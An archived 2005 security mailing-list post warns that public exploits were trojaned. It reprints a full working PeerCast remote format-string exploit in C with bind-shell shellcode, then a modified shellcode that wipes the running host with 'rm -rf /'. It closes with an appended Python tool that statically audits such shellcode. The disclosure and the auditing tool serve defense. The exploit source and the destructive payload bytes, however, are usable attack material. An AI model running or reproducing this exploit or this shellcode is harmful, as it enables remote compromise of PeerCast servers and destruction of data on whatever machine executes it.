lists.openwall.net | Open Source and information security mailing list archives
Message-ID: <200507270255.j6R2tIJw089945@mailserver2.hushmail.com>
Date: Wed Jul 27 03:55:30 2005
From: securitymarket at hush.ai (securitymarket@...h.ai)
Subject: Beware trojaned exploits!

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hackers may be at risk!

It has come to our attention that a large number of public security exploits/software have been modified and re-posted to legitimate trusted information sites for public downloads. We have recently come across 5 exploits that have had a shellcode modification after legit verification of trusted download sites.

The following information security sites have listed a number of modified exploits:

  unl0ck security research
  g0tfault security
  m00 security

Unl0ck was recently broken into by an anti-security/hacker organization named dikline (dikline.com ?) and ALL exploit sources were modified in different ways to infect the host attempting to exploit them. Numerous modified sources of "internal" / "0day" sources by a security group named "m00 security" have also been reported as modified by the dikline organization.

We have audited numerous public exploit codes and have come up with some interesting results. The following is a clear example of modified shellcode:

Original shellcode of the exploit "p33r-b33r.c" by unl0ck:

/*
   \ PeerCast <= 0.1211 remote format string exploit /
        [<< Public Release >>]
   \ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] /
   \ uKt researcherz [ http://unl0ck.org ] /
   \ greetz goes to: uKt researcherz. /
   \ - smallest code - better code!!! /
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>

//*******************************************
/* split a 32-bit address into its four bytes (b0 = most significant) */
#define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
}
//*******************************************

//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
//****************************************************************

//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************

//***********************************************************************
/* build the %x/%n format string that writes retaddr into the four
   addresses already placed at argument positions offset .. offset+3,
   one byte per %n */
char * evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
    char * buf;
    unsigned char b0, b1, b2, b3;
    int start = 256;

    doit( b0, b1, b2, b3, retaddr );

    buf = (char *)malloc(999);
    memset( buf, 0, 999 );

    b3 -= figure;
    b2 -= figure;
    b1 -= figure;
    b0 -= figure;

    snprintf( buf, 999,
              "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
              b3 - 16 + start - base, offset,
              b2 - b3 + start, offset + 1,
              b1 - b2 + start, offset + 2,
              b0 - b1 + start, offset + 3 );

    return buf;
}
//*************************************************************************

//*************************************************************************
int main( int argc, char * argv[] )
{
    struct sockaddr_in addr;
    int sock;
    char * fmt;
    char endian[31337], da_shell[31337];
    unsigned long locaddr, retaddr;
    unsigned int offset, base;
    unsigned char b0, b1, b2, b3;

    system("clear");
    printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
    printf("*^*^*^ by Darkeagle ^*^*^*\n");
    printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");

    memset( endian, 0x00, 31337 );
    memset( da_shell, 0x00, 31337 );

    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(HOST);
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

    locaddr = GOTADDR;
    retaddr = SHELLADDR;
    offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

    doit( b0, b1, b2, b3, locaddr );
    base = 4;

    printf("[*] Buildin' evil code\n");
    strcat(endian, "GET /html/en/index.html");
    /* the four %n targets, little-endian: GOTADDR, GOTADDR+1, +2, +3
       (size argument is the space left in endian, not the whole buffer) */
    snprintf( endian+strlen(endian), sizeof(endian) - strlen(endian),
              "%c%c%c%c" "%c%c%c%c" "%c%c%c%c" "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 1, b2, b1, b0,
              b3 + 2, b2, b1, b0,
              b3 + 3, b2, b1, b0 );

    fmt = evil_builder( retaddr, offset, base, 0x10 );
    memset(fmt+strlen(fmt), 0x55, 32);   /* 0x55 (push ebp) padding in front of the shellcode */
    strcat(fmt, shellcode);
    strcat(endian, fmt);
    strcat(endian, "\r\n\r\n\r\n");
    printf("[+] Buildin' complete!\n");

    sprintf(da_shell, "telnet %s 4444", HOST); // just go, y0!

    printf("[*] Connectin'\n");
    if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) {
        printf("[-] Connection failed!\n\n");
        exit(0);
    }
    printf("[+] Connected!\n");
    printf("[*] Sleepin'\n");
    sleep(1);
    printf("[*] Sendin'\n");
    send(sock, endian, strlen(endian), 0);
    printf("[*] Sleepin'\n");
    sleep(1);
    printf("[*] Connectin' in da shell\n\n");
    sleep(1);
    system(da_shell);

    return 0;
}

-----------

Replaced modified shellcode to rm -rf remote host:

/*
   \ PeerCast <= 0.1211 remote format string exploit /
        [<< Public Release >>]
   \ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] /
   \ uKt researcherz [ http://unl0ck.org ] /
   \ greetz goes to: uKt researcherz. /
   \ - smallest code - better code!!! /
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>

//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
}
//*******************************************

//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
//****************************************************************

The above shellcode is a modified version that was found listed on the unl0ck security website under downloads days before the site went down.

We have audited and found differences in shellcode on the following code: (POSSIBLY MANY MORE)

  unrealmagic.c - shellcode modified to rm -rf /* host
  p33r-b33r.c - shellcode modified to rm -rf /* host
  0x666-ftpd.c - shellcode modified to rm -rf /* host
  gotfault-htdead.c - shellcode modified to rm -rf /* host
  gotfault-lcdproc.c - shellcode modified to install LKM
  gotfault-newspost.c - shellcode modified to rm -rf /* host
  gotfault-ngircd.c - shellcode modified to rm -rf /* host
  gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
  gotfault-openftpd-msg.c - shellcode modified to install LKM
  gotfault-pbs4q.c - shellcode modified to add password to mail users
  gotfault-putty.c - shellcode modified to install LKM
  gotfault-realmagicV2.c - shellcode modified to install LKM
  gotfault-sing.sh - shellcode modified to install unknown backdoor.
  gotfault-vmpsd.c - shellcode modified to rm -rf /* host
  gotfault-zebedee.c - shellcode modified to rm -rf /* host
  gotfault-zebedee-win32.zip - unknown
  gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
  gotfault-3cdsmash.c - shellcode modified to install NEW LKM
  gotfault-psoproxy.c - shellcode modified to install LKM
  gotfault-pcwsd.c - shellcode modified to install LKM

This is an urgent notice to all of the security individuals who have downloaded any of the above (and more) exploits. Please take note of your collections; we must find out what this dikline organization has backdoored and fix it!

*** MAKE SURE to check your shellcode whenever possible.

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA
njACLQnU0QQDfXtKglEjX7ko5TdA
=nU9l
-----END PGP SIGNATURE-----
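The check the post asks for ("MAKE SURE to check your shellcode") can be done without ever executing the bytes. The following is an added example of my own, not code from the post or from unl0ck, g0tfault or m00: a Python audit that pulls the `char shellcode[]` initialiser out of a C source, decodes the C escapes, strips the fnstenv/XOR decoder stub that wraps the legitimate p33r-b33r.c payload, and then reconstructs the strings the payload builds on the stack with `push` and the `int 0x80` calls it makes. The stub shape it recognises, the small Linux x86 syscall table, the suspicious-string list and the opcode heuristics are all assumptions of this example; the two embedded sources are constructed excerpts copying the two shellcode literals quoted above. On those two inputs it reports `/bin//sh` with socketcall/dup2/execve for the original and `/bin/sh`, `-c`, `rm -rf /` with execve/exit for the replacement.

```python
"""Audit an x86 Linux shellcode blob lifted from a C exploit source, without executing it.
Added example, not code from the post. Heuristic byte scan, not a disassembler: it models
only the opcodes these stack-string payloads use, so read its output as a hint for a human."""
import re

# Constructed excerpts: the two `char shellcode[]` initialisers quoted in the post above.
LEGIT_SRC = r'''char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";'''
TROJAN_SRC = r'''char shellcode[] = // binds 4444 port
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";'''

_SIMPLE = {'n': 10, 'r': 13, 't': 9, 'a': 7, 'b': 8, 'f': 12, 'v': 11,
           '\\': 92, '"': 34, "'": 39, '?': 63}
_ESC = re.compile(r'\\x([0-9a-fA-F]+)|\\([0-7]{1,3})|\\(.)|(.)', re.S)

def decode_c_string(lit):
    r"""Bytes of a C string literal body: \xHH (greedy, as in C), \NNN octal, \n and friends."""
    out = bytearray()
    for hx, oc, esc, ch in _ESC.findall(lit):
        if hx:    out.append(int(hx, 16) & 0xff)
        elif oc:  out.append(int(oc, 8) & 0xff)
        elif esc: out.append(_SIMPLE[esc])
        else:     out.append(ord(ch))
    return bytes(out)

def extract_shellcode(c_source, name='shellcode'):
    """Locate `char NAME[] = "..." "...";` in C source and decode it, skipping comments."""
    m = re.search(r'char\s+' + re.escape(name) + r'\s*\[\s*\]\s*=([^;]*);', c_source)
    if not m:
        raise ValueError(f'no char {name}[] initialiser found')
    pieces = re.findall(r'"((?:\\.|[^"\\])*)"|//[^\n]*|/\*.*?\*/', m.group(1), re.S)
    return decode_c_string(''.join(pieces))          # comment matches contribute ''

def unwrap_fnstenv_xor(code):
    """Undo the fnstenv/XOR decoder stub (xor ecx,ecx; sub ecx,-N; fldz; fnstenv [esp-0xc];
    pop ebx; xor dword [ebx+0x13],KEY; sub ebx,-4; loop) if present, else return code as is."""
    stub = re.match(rb'\x31\xc9\x83\xe9(.)\xd9\xee\xd9\x74\x24\xf4\x5b'
                    rb'\x81\x73\x13(.{4})\x83\xeb\xfc\xe2\xf4', code, re.S)
    if not stub:
        return code
    ndwords, key = (-stub.group(1)[0]) & 0xff, stub.group(2)   # ecx = N after sub ecx,-N
    body = code[stub.end():stub.end() + 4 * ndwords]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))

SYSCALLS = {1: 'exit', 11: 'execve', 63: 'dup2', 102: 'socketcall'}
SUSPICIOUS = ('rm -rf', 'rm -fr', '/etc/passwd', '/etc/shadow', 'insmod', 'wget ', 'curl ')

def scan(code):
    """Rebuild strings built by runs of push imm32 (NUL-patched by mov [esp+d8],al with
    al=0, pointer slots blanked by mov [esp+d8],r32) and list int 0x80 calls with eax."""
    images, run, eax, syscalls, i = [], [], None, [], 0
    while i < len(code):
        op, nxt = code[i], code[i + 1:i + 5]
        if op == 0x68 and len(nxt) == 4:                            # push imm32
            run.append(nxt); i += 5; continue
        if run:                                                     # any other opcode ends the run
            images.append(bytearray(b''.join(reversed(run)))); run = []
        if op == 0x66 and nxt[:1] == b'\x68': i += 4                          # push imm16
        elif op == 0x6a and nxt[1:2] == b'\x58': eax = nxt[0]; i += 3         # push imm8; pop eax
        elif op == 0x6a: i += 2                                               # push imm8
        elif op == 0x31: eax = 0 if nxt[:1] == b'\xc0' else eax; i += 2       # xor r32,r32
        elif op == 0x40: eax = None if eax is None else eax + 1; i += 1       # inc eax
        elif op == 0xb0 and nxt: eax = nxt[0]; i += 2                         # mov al, imm8
        elif op == 0x88 and nxt[:2] == b'\x44\x24' and len(nxt) > 2:          # mov [esp+d8], al
            if images and eax == 0 and nxt[2] < len(images[-1]): images[-1][nxt[2]] = 0
            i += 4
        elif op == 0x89 and nxt[1:2] == b'\x24' and len(nxt) > 2 and (nxt[0] & 0xc7) == 0x44:
            if images and nxt[2] + 4 <= len(images[-1]): images[-1][nxt[2]:nxt[2] + 4] = bytes(4)
            i += 4                                                  # mov [esp+d8], r32 (a pointer)
        elif op == 0xcd and nxt[:1] == b'\x80': syscalls.append(eax); eax = None; i += 2  # int 0x80
        else: i += 1
    if run:
        images.append(bytearray(b''.join(reversed(run))))
    strings = [s.decode('latin-1') for img in images for s in bytes(img).split(b'\0') if len(s) >= 2]
    return strings, syscalls

def audit(c_source):
    """Decode, unwrap and scan one C source; flag stack strings that smell like a trojan."""
    strings, syscalls = scan(unwrap_fnstenv_xor(extract_shellcode(c_source)))
    return {'strings': strings,
            'syscalls': ['?' if n is None else SYSCALLS.get(n, f'sys_{n}') for n in syscalls],
            'suspicious': [s for s in strings if any(k in s for k in SUSPICIOUS)]}

if __name__ == '__main__':
    for label, src in (('legit', LEGIT_SRC), ('trojan', TROJAN_SRC)):
        print(label, audit(src))
```

Running the file prints both verdicts. The scan is deliberately narrow: push-built strings, a few eax-setting idioms and `int 0x80`. A payload wrapped in an encoder it does not recognise, or one that assembles its strings some other way, comes back with no strings and `?` syscalls, and the right follow-up is a real disassembler or a run in a throwaway VM. It also only tells you what the bytes do, not whether they are the author's: where a signed release or a published hash exists, compare against that as well.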